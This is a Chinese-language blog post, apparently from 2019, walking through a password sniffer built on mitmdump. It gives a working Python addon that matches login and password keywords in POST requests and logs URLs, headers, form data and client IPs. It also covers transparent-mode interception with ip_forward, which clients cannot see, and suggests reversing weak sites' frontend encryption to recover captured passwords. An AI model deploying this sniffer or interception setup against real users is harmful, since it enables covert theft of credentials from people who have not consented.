使用 Mitmdump 與 Python 指令碼進行密碼嗅探

擺碼王子發表於2019-02-03

很久沒有寫文章了,一是沒空,二是幾乎忘了還有這回事。這篇應該是年前的最後一發吧!那麼今天就來聊一聊我最近關於網路抓包的一些實踐(其實我對網路安全領域知之甚少)。當然,大家最熟知的工具可能是 Wireshark,它的功能十分強大。不過它大概不支援熱插拔指令碼,也就沒辦法實現完全自有掌控的抓包。於是不就之後,Mitmproxy 這貨進入了我的視線,用它可以方便的新增自定義抓取邏輯的 Python 指令碼,可以說非常容易擴充套件,完美的解決了我的需求。這也是寫完 Keykee 之後,再一次將這一傻式程式語言應用到生產實踐中。

突然想起了自己入行這兩年的一個感悟:

程式設計師有時候應該感謝給自己提需求的人。

Mitmdump 是 Mitmproxy 的一個分支,它就是實現根據自定義的指令碼進行 dump 的核心工具。如果就是在自己機器上玩一玩的話,使用常規模式 (Regular Mode) 即可。關於 Mitmproxy 這幾種模式的詳細介紹可以看官方文件,這是常規模式的原理圖:

使用 Mitmdump 與 Python 指令碼進行密碼嗅探

如果有中間人攻擊的因素在裡面的話需要配合 Linux 的 ip_forward,並且使用 Mitmdump 的透明模式( Transparent Mode),它對客戶端來說是不可見的:

使用 Mitmdump 與 Python 指令碼進行密碼嗅探

通常情況下,常規和透明這兩種模式可以滿足大部分的實驗需求。

Mitmdump 可以通過 pip 安裝:

$ pip install mitmproxy
複製程式碼

安裝完之後就可以在任何地方使用 mitmdump 命令操作了。

如果需要抓取 https 請求的話,需要在系統中匯入 Mitmproxy 的根證照,如果只在某個瀏覽器中實驗的的話,也可以直接在瀏覽器中匯入。證照的預設位置在 ~/.mitmproxy 目錄下。

然後設定系統的網路代理,根據需要設定“對所有協議使用相同代理”。代理 ip 為 127.0.0.1,代理埠為 8080。

這樣,準備工作就做好了。

這次嘗試編寫一個密碼嗅探的指令碼,前面提到了,它的擴充套件性非常!!!所以我這裡就拋磚引玉了。

sniffer.py

import logging
from mitmproxy import http

password_key = ["password", "pwd", "pass", "passwd", "mm", "passport", "auth", "key", "mima"]
form_login_key = ["check", "login", "verify", "account", "logon", "signin", "denglu"]


class Sniffer:

    def request(self, flow: http.HTTPFlow):
		request = flow.request
		url = request.pretty_url
		form_url = str(request.urlencoded_form)
		if request.method == 'POST':
			if self.any_match(form_login_key, url) or self.any_match(password_key, form_url):
				self.resolve(flow)
                
	def any_match(self, list, str: str):
		lower_str = str.lower()
		for i in list:
			if i in lower_str:
				return True
		return False

	def resolve(self, flow: http.HTTPFlow):
		request = flow.request
		url = request.url
		_from = str(flow.client_conn.ip_address)
		url_form = str(request.urlencoded_form)
		header = str(request.headers)

		logging.info("url: %s \nheader: %s \nform: %s \nip_from: %s", url, header, url_form, _from)

複製程式碼

Mitmdump 會建立一個 Sniffer 類的例項,並呼叫 request(flow) 方法,它可以一次插入多個這樣的 class,只需要提供一個統一的入口即可:

addons.py

from sniffer import Sniffer

addons = [
	Sniffer()
    # YourSniffer()
    # ...
]
複製程式碼

最後,執行mitmdump 命令開始抓包:

$ mitmdump -q -s addons.py --set body-size-limit=10k "~m post"
複製程式碼
  • -q 遮蔽 mitmdump 預設的控制檯日誌,只顯示自己指令碼中的
  • -s 入口指令碼檔案
  • --set body-size-limit=10k 只處理小於 10k 的請求
  • "~m post" 只處理 post 方法的請求

啟動之後訪問一個自己認為安全性相對較差的站點,進行使用者登入的操作,然後控制檯裡出現了使用者名稱密碼等資訊,如果經過加密了,找到這個頁面的前端程式碼研究一下加密方式,安全性較差的站點很容易就能搞明白。

最後,歡迎來我的擺碼王子的小屋做客!

各位朋友,新春愉快 : )

相關文章